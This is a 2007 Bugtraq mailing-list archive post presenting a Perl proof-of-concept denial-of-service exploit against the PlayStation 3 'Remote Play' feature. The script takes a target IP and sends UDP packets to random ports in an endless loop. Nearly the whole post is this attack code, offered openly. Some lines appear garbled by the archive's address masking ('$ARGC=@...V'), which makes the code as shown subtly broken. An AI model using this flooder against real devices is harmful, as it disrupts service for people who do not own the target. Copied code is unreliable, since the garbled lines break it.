lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070326052425.30767.qmail@securityfocus.com>
Date: 26 Mar 2007 05:24:25 -0000
From: mak0b@...ox.com
To: bugtraq@...urityfocus.com
Subject: Playstation 3 "Remote Play" Remote DoS Exploit

#!/usr/bin/perl

####.:Playstation 3 "Remote Play" Remote DoS Exploit:.####
#
# A UDP flood while the "remote play" feature is active
# will result in a denial of service condition.	
#
# Tested using PS3 v1.60 (20GB) & PSP v3.10 OE-A
#
# -Dark_K <mak0b[AT]inbox.com>
# 
# POC code is based on odix's perl udp flooder
##########################################################

use Socket;

$ARGC=@...V;

if ($ARGC !=1) {
 printf "usage: ./ps3rpdos.pl <ip>\n";
 exit(1);
}

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ARGV[0]");

printf "Sending...\n";

for (;;) {
 $size=$rand x $rand x $rand;
 $port=int(rand 65000) +1;
 send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ